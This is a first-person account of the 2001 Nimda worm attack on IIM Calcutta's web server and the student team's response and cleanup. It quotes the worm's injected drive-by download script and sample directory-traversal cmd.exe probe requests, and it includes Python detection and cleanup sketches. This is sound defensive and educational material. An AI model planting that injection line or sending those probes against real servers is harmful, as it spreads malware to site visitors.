November 22, 2004

When Things suddenly went wrong: w32.nimda.a@mm

The attack of the worm and the response.

This is a description of the Nimda virus attack on the official web site of Indian Institute of Management, Calcutta, on 18th September, 2001 and the subsequent response by the student system administrator team.

I was in my room, preparing for a course submission two days away, when the first alarm trickled down to me. I was struggling with a VB project, with Megadeth having sole control of my eardrums, when my neighbor Vipul interrupted me. He was pretty incomprehensible at first, but slowly it dawned on me that I was supposed to log onto the institute web site.

As soon as I logged onto the site I knew something was wrong. We had left it safe and sound not more than two hours ago. But now, as soon as the page came up, a second window popped up and requested the download of a "readme.eml" file. I knew that eml files were used to save emails by Outlook and Outlook Express. I hoped against hope that the eml file had something to do with my open Outlook, but very soon I was disabused.

I opened a second page on the web site, which also resulted in the pop up and download of the same "readme.eml" file. Twice was definitely no coincidence. Fighting that sinking feeling, my hope B was that the site may have been hacked or was under attack. I had to look for something, either confirming or denying this hypothesis. And the only clue I had was the eml file. Using Outlook to figure out the contents of the file showed me that there was indeed an executable file "readme.exe" as an attachment within the eml file.

The existence of the attachment caused a variety of alarm bells to go off in unison. Firstly it definitely looked like a virus, and secondly it was propagating from the web site and not via email. That morning, I had read about another variant of the 'code red' virus that was reportedly ready to start damage. Fearing the worst, my next steps were clear - I had to be at the server room physically and not in my room trying to do anything remotely. I called Vipul to join me and hurried to the main server room.

Why I was spared

Thinking back, it was pretty reckless of me to try to get to the details of the eml file in my room. But I eventually escaped infection - by nothing more than pure luck. A few days ago, my computer had been unceremoniously powered off a number of times by the Electricity corporation of West Bengal forcing me to reinstall Windows. As a result of this I ended up downgrading my Internet Explorer from the newer 5.5 version to the default 5 version that came bundled with Win98. As we will see later, the reinstall was a blessing in disguise. If this had not been the case, I would have been cleaning my own machine and saving my VB projects, instead of being free to work on just the main server.

The Server room

I was greeted at the server room by an extremely sluggish main server. This was a Compaq Proliant ML 350 running Windows NT 4. It took more than two minutes just to get to the logon screen. And all the while I could clearly see the hard drive thrashing. I was sorely tempted to switch off the machine and get it offline so that I could safely start it back up to see what damage had been done. But knowing nothing more about what was happening or the cause, I was reluctant to take any drastic measures. I continued to try to get the machine back in control.

By the time I finally got to the Shell, there was no one there. Explorer was dying intermittently and Dr.Watson (the crash recovery program on NT) was spawning all over the place. Then I found the one tool that differentiated the NT line from Windows 9x - the Task manager. Quickly I brought it up and killed off the erring Explorer and all the goody Dr.Watsons. Switching to the process list I saw dozens of running processes called 'net'. As far as I knew, none was how many I should have seen. Meanwhile, there was no let up for the hard disk and the machine was barely responsive. In the next few minutes I slaughtered as many of the unnecessary processes as I could lay my mouse on and, when I found the machine a tad quicker, sent it for a shutdown. Amidst screaming new processes the server went down.

Once I had the server down, there was a sense of peace. At least no further damage could be done. But God only knew what damage had already been done. At this point, I was still trying to convince myself that the whole thing was a hack of some kind, given the many 'net' processes and my ignorance. Yanking off the cable connecting the server I started it back in VGA mode, which was not even a safe mode, but hopefully would allow me to poke around. Dear old Explorer and Dr.Watson were up to the same antics as before. I killed each in turn and finally managed a stable Explorer as long as no one was double clicking programs.

When I finally got to the root directory and opened the default.asp file I saw that very wonderful line I would see over and over again over the next few days.

<html><script language="JavaScript">window.open("readme.eml",null, "resizable=no, top=6000, left=6000")</script></html>

What it did was what we had seen when accessing the site - it downloaded the file "readme.eml" onto the computer of anyone who happened to load the page. The file "readme.eml" was of course present in the directory. A quick check showed that the default pages in each of the subdirectories were similarly changed and the "readme.eml" file was present in all of them too.

If there was a need for confirmation, this was it. It seemed less and less like a hacker and more and more like a script from a virus or a worm. And I realized that I needed to talk to someone with ideas. We were already trawling the anti-virus sites, trying to see if they had any news. Meanwhile, I went looking for help.

Trying to find help in the campus, my worst fears came true. Across the campus, computers were behaving strangely, MS Word was not saving, and some machines wouldn't even boot. The story was remarkably the same everywhere.

"Oh yeah, I did double click on that readme letter, and now it keeps popping up a warning message with 'OK' 'Details>>' buttons."

"I ran a live update yesterday and Norton at the moment does not detect any viruses."

"Every time I reboot things are becoming more and more difficult."

The main server was down, and I had no luck in finding anyone who had more experience with the server. Sometime around this time, handwritten notices were put up across the campus urging students not to click on any files that said readme or looked like a letter.

What the hell is it?

Back alone in the server room I restarted the server and this time it was tougher controlling Explorer and its buddy Dr.Watson. Finally I killed both of them and started browsing using the command shell. Then I spent time figuring out where the actual executables of the various programs in the Start menu were and started all the monitors and the mmc console that I needed. Then came another crackdown on the various processes that I felt were unnecessary, including the HTTP and FTP servers. Now I needed more information.

Before we continue, a quick look at the setup we have in IIM Calcutta. We have an intranet of about 400 student machines, and more including those of the professors. All are connected to the Internet through two proxies - one Novell and one Linux. The (affected) Web Server is not connected to the internal network directly. Apart from the two proxies there was a third machine running Linux (Red Hat 7.1) that also had two network cards, connected both to the intranet and the Internet. This was a temporary pilot server located next to the main Web Server, and formed the hub of repair activities over the next 35 hours. Presently the machine was being used to poll the web sites of Norton and McAfee, with little information to show for it. Further searching by Vipul too yielded the same result - nothing on this, yet.

In time we assembled a team that would be responsible for the task of not only getting the main Server up but also getting the entire intranet rid of the virus. With the team came experience and more ideas. Back on the main Server, the first readme.eml was created at 6:55 p.m. This was the time when the first of the default.asp files was last modified. Vipul's call to me was about an hour later. So the web server was online for a whole hour with the virus doing whatever it was supposed to do. We also discovered that all files that were named default or index had been modified over a period of 6-7 minutes starting 6:55 p.m., pointing to the involvement of a remote script. No script run on the same machine would have taken so long. Files not linked to from the main web site (like indexold.asp) were also affected. All fingers now pointed to an external infection through the IIS web server, similar to Code Red.
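The timestamp reasoning above is easy to reproduce on a copy of a site. What follows is only a minimal Python sketch of the idea, not the tooling used on the night; the function name `modification_window` and the `site_copy` path are hypothetical, chosen for illustration.

```python
import os
from datetime import datetime
from fnmatch import fnmatch


def modification_window(site_root, patterns=("default*", "index*")):
    """Return (earliest, latest, count) of mtimes for files matching patterns.

    Returns (None, None, 0) when nothing matches.
    """
    mtimes = []
    for dirpath, _dirnames, filenames in os.walk(site_root):
        for name in filenames:
            # Lower-case the name so DEFAULT.ASP and default.asp both match.
            if any(fnmatch(name.lower(), p) for p in patterns):
                mtimes.append(os.path.getmtime(os.path.join(dirpath, name)))
    if not mtimes:
        return None, None, 0
    return (datetime.fromtimestamp(min(mtimes)),
            datetime.fromtimestamp(max(mtimes)),
            len(mtimes))


# "site_copy" is a hypothetical directory holding a copy of the web root.
first, last, count = modification_window("site_copy")
if count:
    print(f"{count} files modified between {first} and {last}")
else:
    print("no default*/index* files found")
```

A narrow window covering every default and index file, including ones nothing links to, is the pattern that pointed us away from a human intruder and towards an automated script.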

With no further word from the anti-virus sites (so we thought) and a pathetically crippled system, most of us realized that this was not going to be a quick delete-and-change-password recovery. Also reports were trickling in that the virus was rampant across the intranet. All drives were being put on active share and machines on the network with any sort of write permissions were being promptly written into. Looking at the way the payload was working, machines needed to be isolated. Taking a quick decision, we manually switched off all the routers in the student section, and the student section summarily went offline.

It was already late in the night and there was still no word from the anti-virus sites. Just to be sure we got a copy of the readme.eml file and ran checks on it with all the latest anti-virus packages available. None saw anything wrong with the file, not exactly in line with what the rest of the student machines were seeing. Then I got probably the last brain wave before my brain shut down for the period - Slashdot. And sure enough it was the third article posted a while back, with links. Now we had a name, nay two, Nimda and Minda. And things were checking out and the worst fears were out in black and white. It was quite late in the night, around 2:00 a.m., and there was one update posted by McAfee and none by Symantec. Our intranet ran on Norton and so things did not look any better. We decided to keep the routers down and the site offline till further notice. Now began the damage control exercises.

Damage Control

As is the case with any other network, the first need was to assure the populace that the steps taken were not to deprive them of the network usage but to protect them. Official notices went out that detailed what had happened and what needed to be done. Also a temporary deadline of 10 a.m. was communicated before we would consider getting the network back online. There was additional control to be done. With any campus as dependent as ours on the network, communication suddenly ground to a halt. The summer placement process came to a halt. Rumors were rampant, with many quotes attributed to the team handling the crisis. Most had to be countered and the account put straight. Then of course we had to assure all those who were infected that things would be fine and tomorrow would be a better day.

'Tomorrow', just a few hours later, was not a better day. The McAfee update proved to be useless. That was after uninstalling Norton from a number of affected machines, installing McAfee, updating it, running system-wide scans and deleting many of the affected files.

Almost 14 hours into the attack and we hadn't made much progress. The deadline for keeping the routers down was extended to 6:00 p.m. that evening and more notices were printed. Norton was quiet and we had to wait. But in the meantime things did get better, as more and more information became available and we also got some cleaning underway. The main advantage we had was the Linux machine on the network. We could get some parts of the plan in action.

The last backups we had of the entire web site were hopelessly out of date. So we got the infected site zipped up and ftp'ed over into the Linux machine. Ditto the database. Along went copies of the readme.eml file and the readme.exe file.

Information and Modus operandi

Running strings on the executable file was very informative. The strings program basically looks through the entire file and prints out the ASCII strings embedded in it. For example, if you write a program that prints "Hello World" and make it into an executable, then strings on the executable would print this string out amongst others. Some excerpts of what we found are given here. Don't worry about understanding all of it; we did not either. But this definitely gave us some clues about the way this virus worked. Most of what we found was further validated by the others in the security business. You can check the other sources out by browsing through the links below.
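For readers without the strings program at hand, the idea fits in a few lines. This is a simplified Python sketch of what strings does, not the tool itself: it only looks for runs of printable ASCII bytes, and the four-character minimum mirrors the usual default. The name `extract_strings` and the sample bytes are made up for illustration.

```python
import re


def extract_strings(data, min_length=4):
    """Return runs of printable ASCII at least min_length bytes long."""
    # \x20-\x7e covers space through tilde, i.e. printable ASCII.
    pattern = rb"[\x20-\x7e]{%d,}" % min_length
    return [m.decode("ascii") for m in re.findall(pattern, data)]


# Invented sample: readable text buried between non-printable bytes.
sample = b"\x00\x01Hello World\x00\xff\x02abc\x00readme.exe\x00"
print(extract_strings(sample))  # ['Hello World', 'readme.exe']
```

The short run "abc" is dropped because it is under the minimum length, which is what keeps the output of such a scan readable on a real binary.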

A quick rundown on how the virus spreads. And since no one really knew what it 'does', apart from spreading that is, we will focus this discussion on how it spreads. Most of this information was culled from the various sources available at that time and from the experience in the campus. Most of the links on this page have more information, but that does not take away from the fact that this information was crucial to us at that time.

Nimda has three methods of propagation, all of which were visible in our setup. The first is the IIS vulnerability. This is the method that was used by Code Red too. Infected servers randomly search for other servers running IIS and attack them. Some attack sequences that took place in vain on our Linux server are here. After the attack the host is forced to run scripts that update the index*.* and default*.* files on the server with the JavaScript string and also copy the readme.eml into the various subdirectories. With this the infection of the host is complete. Of course the worm also takes protection against detection and removal in the host machine. Once infected, the IIS servers are primarily involved in infecting other servers. Our web server first attacked the Linux server at 7:56 p.m. after being infected itself at 6:55 p.m. Since neither knew about the other, and assuming the initial choice is done randomly, this one observation of about an hour gives a rough idea of how long an infected server takes to find another one in the same IP range.
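Probes of this kind show up in a web server's access log as requests for Windows executables that a Linux box simply does not have. The sketch below, in Python, counts such requests per client. It rests on several assumptions: the log is in the common Apache-style format, the markers `cmd.exe` and `root.exe` are taken from publicly reported Nimda probe patterns and are not a complete signature list, and the sample lines are invented for illustration rather than taken from our logs.

```python
import re
from collections import Counter

# Substrings widely reported in Nimda probe requests (an assumption for
# illustration, not an exhaustive list).
PROBE_MARKERS = ("cmd.exe", "root.exe")

# Client address at the start of the line, then the path inside "METHOD /path".
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|HEAD|POST) (\S+)')


def count_probes(log_lines):
    """Count suspicious requests per client address."""
    hits = Counter()
    for line in log_lines:
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, path = match.groups()
        if any(marker in path.lower() for marker in PROBE_MARKERS):
            hits[client] += 1
    return hits


# Invented sample lines; addresses come from the documentation range 192.0.2.0/24.
sample_log = [
    '192.0.2.10 - - [01/Jan/2000:00:00:01 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 271',
    '192.0.2.10 - - [01/Jan/2000:00:00:02 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 285',
    '192.0.2.77 - - [01/Jan/2000:00:01:10 +0000] "GET /index.html HTTP/1.0" 200 1043',
]
for client, hits in count_probes(sample_log).items():
    print(client, hits)
```

On a server that is not running IIS these requests all fail, so the count is mostly useful for spotting which neighbours are already infected.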

The second and third modes of transmission occur on the Client machines, after they are infected. Client machines are infected when they visit any site that has been visited by Nimda. A new popup JavaScript window opens that downloads and opens the readme.eml file directly, without user intervention. This auto-execute feature is a security bug in IE5.5, which was what was missing in my copy of IE5 and consequently saved my machine. Once the readme.exe is executed, which may not need you to double click on it, the wily program is inside and it does take a long time to clear out. More information is available on what it does all over the Web. Click on the several links that are at the end of the page.

The second mode is mass mailing. The worm comes with its own mailing engine. It uses MAPI to find addresses and mail itself to all your contacts. Then the cycle repeats itself as soon as the target machines are compromised.

The third method is infection across the local network through Microsoft file sharing. It searches for writable shared folders and dumps copies of itself into them. While this does not automatically infect the machine, curiosity to see what the file contains ends up in the machine being compromised.

The long trudge back to normalcy

Back to the story. It was after noon and there were no cleaning tools available. We had volunteers hitting the F5 refresh button every few minutes on all the major anti-virus sites. At the same time we started looking at other methods of cleaning. Earlier we had taken a zip of the entire site and moved it into the Linux machine. Now we unzipped the whole site and started seeing what needed to be done if we were to have a clean version of the site ready for install. We put together a quick script that cleaned all the download lines in the affected asp and html files. You can see the script here. Then a single statement with find deleted all the eml files from the entire site. We followed that up with a tar -cvzf and voilà, we had a clean version of the site to deploy - only no web server.
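For anyone facing a similar cleanup, here is a rough Python sketch of the same two steps: strip the injected line from the pages, then delete the eml files. It is not the script we used; the function name `clean_site`, the list of page extensions and the exact pattern are assumptions based on the injected line shown earlier. Run anything like this only on a copy of the site, since it deletes every .eml file it finds.

```python
import os
import re

# The line the worm added to pages, matched loosely on whitespace and case.
INJECTED_RE = re.compile(
    r'<html>\s*<script language="JavaScript">\s*'
    r'window\.open\("readme\.eml".*?</script>\s*</html>\s*',
    re.IGNORECASE,
)
PAGE_EXTENSIONS = (".asp", ".htm", ".html")


def clean_site(site_root):
    """Strip the injected line from pages and delete .eml files.

    Returns (pages_cleaned, eml_deleted).
    """
    pages_cleaned = eml_deleted = 0
    for dirpath, _dirnames, filenames in os.walk(site_root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            lower = name.lower()
            if lower.endswith(".eml"):
                os.remove(path)
                eml_deleted += 1
            elif lower.endswith(PAGE_EXTENSIONS):
                # latin-1 with newline="" round-trips every byte unchanged.
                with open(path, "r", encoding="latin-1", newline="") as f:
                    text = f.read()
                cleaned, count = INJECTED_RE.subn("", text)
                if count:
                    with open(path, "w", encoding="latin-1", newline="") as f:
                        f.write(cleaned)
                    pages_cleaned += 1
    return pages_cleaned, eml_deleted
```

Calling `clean_site("site_copy")` on an unzipped copy (the path is hypothetical) returns how many pages were rewritten and how many eml files were removed, which makes a handy sanity check before packing the result back up.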

Our prayers were soon to be answered. Symantec did come out with the update, and we were back in action, on the main server. Hours of downloads and reinstallation of Norton anti-virus revealed that most of the new-found enthusiasm was in error. The patches for Code Red were not properly installed and there were other updates to be done before the cleaning was to succeed. The next few hours were spent in cycles of search/locate/download-into-linux-server/ftp-to-main-server/patch-and-update.

In the meantime we used the machine which had a controlled copy of the worm to cause infection and then clean with the anti-virus. This confirmed that the update might indeed work on workstations, though at that time it was highly ineffective on servers. Also our 6:00 p.m. deadline was upon us and we had to stretch it over to 10:00 p.m. that night. But now we had the anti-virus and also information on the propagation of the virus. Notices went out on the need to disable all file sharing from students' computers, infected or otherwise. Also a step-by-step drill was developed to be followed by all users at 10:00 p.m., when the network came back online. Notices went up and leaflets were distributed. Volunteers went out armed with three diskettes containing the updates, to all the critical computer installations in the campus to clean and secure them before the 10:00 p.m. deadline.

The struggle in the server room was in full swing. By the time most of the patches were in place (there was one we missed and would not know about until much later) the server must have rebooted a billion times. Finally the virus scan was in place and we realized how lucky we were to have created a clean copy of the site ready for deployment. Norton was deleting all the files that it could not clean, and that included most of the startup pages in the web site, and all of its sections. After letting the scan run to completion, many times over, we were quite sure that we were clean.

The 10:00 p.m. deadline came and the routers went online. The net-starved IIM Calcutta community immediately came online. To make it easy for the users, and also to provide an alternative till the main web server came up, the Linux box mirrored all the updates, and information about the drill to clean infected computers.

The day crossed over into the next, and at 12:00 a.m. the site zip was in place and file copy was in progress. By around 1:00 a.m. the site tentatively came live, minus the cable connecting it to the network. After browsing a while and making sure that the site was indeed the way it was supposed to be, we went live.

By 2:00 a.m. we were back offline and deleting the admin.dll that had tftp'ed itself into the temp folder. Frantic searching located the missing patch. Patch-rinse-repeat. Now the server did hold but we did not have the energy to keep monitoring it or the guts to keep it online without supervision. So the server went back offline and we went to bed.

The next morning arrived without me in the server room. I was back with Megadeth at full blast trying to complete my Project in time that suddenly had 40 fewer hours to the deadline. But the news was that the freshly patched server was holding up and doing well. Of course a number of client machines are still infected and need to be cleaned. But so far we have not had a single report of late or cross infection.

(We got a 12 hour extension on the project submission and mine did go well in time. Thanks for asking anyway)

Related links

Symantec
Mcafee
Trend Micro Update
F-Secure virus definitions
Symantec Removal Tool
CERT Advisory, with a number of other links too.
Another Fight: The TechRepublic battles

Document Changes
November 22, 2004: Essential rewrite of article stressing the central idea and new links too.
April 02, 2009: Updates and corrections.
